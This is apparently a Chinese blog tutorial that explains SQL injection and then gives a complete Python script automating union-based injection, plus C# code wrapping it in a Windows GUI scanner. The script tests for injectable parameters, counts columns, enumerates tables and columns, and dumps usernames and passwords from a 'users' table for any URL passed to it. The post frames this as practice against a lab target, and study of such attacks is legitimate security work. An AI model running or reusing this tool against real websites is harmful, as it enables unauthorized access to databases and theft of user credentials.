时间:2022-07-01 09:47:56 | 栏目:C代码 | 点击:次
原理:
SQL注入是指攻击者在Web应用程序中事先定义好的查询语句的结尾加上额外的SQL语句,这些一般都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作。(危害:盗取网站敏感信息、绕过验证登录网站后台、借助数据库的存储过程进行权限提升等操作)。造成的原因是程序员在编写Web程序时,没有对浏览器提交的参数进行严格的过滤和判断,用户可以构造参数,提交SQL查询语句,并传递到服务器端,从而获取敏感信息。
方法:
常使用的方法:
搭建靶场环境
使用python编写脚本实现自动注入
import time import sys from urllib import request from bs4 import BeautifulSoup def log(content): this_time = time.strftime('%H:%M:%S', time.localtime(time.time())) print('[' + str(this_time) + '] ' + content) def send_request(url): # log(url) res = request.urlopen(url) result = str(res.read().decode('utf-8')) return result def can_inject(test_url): test_list = ['%27', '%22'] for item in test_list: target_url1 = test_url + str(item) + '%20' + 'and%201=1%20--+' target_url2 = test_url + str(item) + '%20' + 'and%201=2%20--+' result1 = send_request(target_url1) result2 = send_request(target_url2) soup1 = BeautifulSoup(result1, 'html.parser') fonts1 = soup1.find_all('font') content1 = str(fonts1[2].text) soup2 = BeautifulSoup(result2, 'html.parser') fonts2 = soup2.find_all('font') content2 = str(fonts2[2].text) if content1.find('Login') != -1 and content2 == None or content2.strip() == '': log('Use ' + item + ' -> Exist SQL Injection') return True, item else: log('Use ' + item + ' -> Not Exist SQL Injection') return False, None def test_order_by(url, symbol): flag = 0 for i in range(1, 100): log('Order By Test -> ' + str(i)) test_url = url + symbol + '%20order%20by%20' + str(i) + '--+' result = send_request(test_url) soup = BeautifulSoup(result, 'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) if content.find('Login') == -1: log('Order By Test Success -> order by ' + str(i)) flag = i break return flag def get_prefix_url(url): splits = url.split('=') splits.remove(splits[-1]) prefix_url = '' for item in splits: prefix_url += str(item) return prefix_url def test_union_select(url, symbol, flag): prefix_url = get_prefix_url(url) test_url = prefix_url + '=0' + symbol + '%20union%20select%20' for i in range(1, flag): if i == flag - 1: test_url += str(i) + '%20--+' else: test_url += str(i) + ',' result = send_request(test_url) soup = BeautifulSoup(result, 'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) for i in range(1, flag): if content.find(str(i)) != -1: temp_list = content.split(str(i)) return i, temp_list def exec_function(url, symbol, flag, index, temp_list, function): prefix_url = get_prefix_url(url) test_url = prefix_url + '=0' + symbol + '%20union%20select%20' for i in range(1, flag): if i == index: test_url += function + ',' elif i == flag - 1: test_url += str(i) + '%20--+' else: test_url += str(i) + ',' result = send_request(test_url) soup = BeautifulSoup(result, 'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0] def get_database(url, symbol): test_url = url + symbol + 'aaaaaaaaa' result = send_request(test_url) if result.find('MySQL') != -1: return 'MySQL' elif result.find('Oracle') != -1: return 'Oracle' def get_tables(url, symbol, flag, index, temp_list): prefix_url = get_prefix_url(url) test_url = prefix_url + '=0' + symbol + '%20union%20select%20' for i in range(1, flag): if i == index: test_url += 'group_concat(table_name)' + ',' elif i == flag - 1: test_url += str(i) + '%20from%20information_schema.tables%20where%20table_schema=database()%20--+' else: test_url += str(i) + ',' result = send_request(test_url) soup = BeautifulSoup(result, 'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0] def get_columns(url, symbol, flag, index, temp_list): prefix_url = get_prefix_url(url) test_url = prefix_url + '=0' + symbol + '%20union%20select%20' for i in range(1, flag): if i == index: test_url += 'group_concat(column_name)' + ',' elif i == flag - 1: test_url += str(i) + '%20from%20information_schema.columns%20where%20' \ 'table_name=\'users\'%20and%20table_schema=database()%20--+' else: test_url += str(i) + ',' result = send_request(test_url) soup = BeautifulSoup(result, 'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0] def get_data(url, symbol, flag, index, temp_list): prefix_url = get_prefix_url(url) test_url = prefix_url + '=0' + symbol + '%20union%20select%20' for i in range(1, flag): if i == index: test_url += 'group_concat(id,0x3a,username,0x3a,password)' + ',' elif i == flag - 1: test_url += str(i) + '%20from%20users%20--+' else: test_url += str(i) + ',' result = send_request(test_url) soup = BeautifulSoup(result, 'html.parser') fonts = soup.find_all('font') content = str(fonts[2].text) return content.split(temp_list[0])[1].split(temp_list[1])[0].split(',') def do_sql_inject(url): log('Welcome To SQL Injection Tool') log('Check For SQL Injection......') result, symbol = can_inject(url) if not result: log('Target Url Not Exist SQL Injection -> Exit') return else: log('Test Order By And Union Select......') flag = test_order_by(url, symbol) index, temp_list = test_union_select(url, symbol, flag) database = get_database(url, symbol) version = exec_function(url, symbol, flag, index, temp_list, 'version()') this_database = exec_function(url, symbol, flag, index, temp_list, 'database()') log('Success -> ' + database.strip() + ' ' + version.strip()) log('Database -> ' + this_database.strip()) tables = get_tables(url, symbol, flag, index, temp_list) log('Tables -> ' + tables.strip()) log('Default Use Table users......') columns = get_columns(url, symbol, flag, index, temp_list) log('Columns -> ' + columns.strip()) log('Try To Get Data......\n\n') datas = get_data(url, symbol, flag, index, temp_list) temp = columns.split(',') print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2])) for data in datas: temp = data.split(':') print('%-12s%-12s%-12s' % (temp[0], temp[1], temp[2])) if __name__ == '__main__': do_sql_inject(sys.argv[1]+'/?id=1')
编写windows客户端软件调用.py脚本
对于python脚本中包含第三方模块的情况,同样,通过直接创建Process进程,调用python脚本,返回扫描结果。
private void button13_Click(object sender, EventArgs e) { richTextBox8.Clear(); runPythonsql_inject();//运行python函数 label39.Text = "开始扫描..."; }
void runPythonsql_inject() { string url = textBox10.Text; p = new Process(); string path = "sql_inject.py";//待处理python文件的路径,本例中放在debug文件夹下 string sArguments = path; ArrayList arrayList = new ArrayList(); arrayList.Add(url);//需要挖掘的域名 foreach (var param in arrayList)//拼接参数 { sArguments += " " + param; } p.StartInfo.FileName = @"D:\Anaconda\python.exe"; //没有配环境变量的话,可以写"xx\xx\python.exe"的绝对路径。如果配了,直接写"python"即可 p.StartInfo.Arguments = sArguments;//python命令的参数 p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.CreateNoWindow = true; p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; p.Start();//启动进程 //MessageBox.Show("启动成功"); p.BeginOutputReadLine(); p.OutputDataReceived += new DataReceivedEventHandler(p_OutputDataReceived_sql_inject); Console.ReadLine(); //p.WaitForExit(); }
void p_OutputDataReceived_sql_inject(object sender, DataReceivedEventArgs e) { var printedStr = e.Data; Action at = new Action(delegate () { //接受.py进程打印的字符信息到文本显示框 richTextBox8.AppendText(printedStr + "\n"); label39.Text = "扫描结束"; }); Invoke(at); }
github地址:https://github.com/Chenmengx/Penetration-testing-tool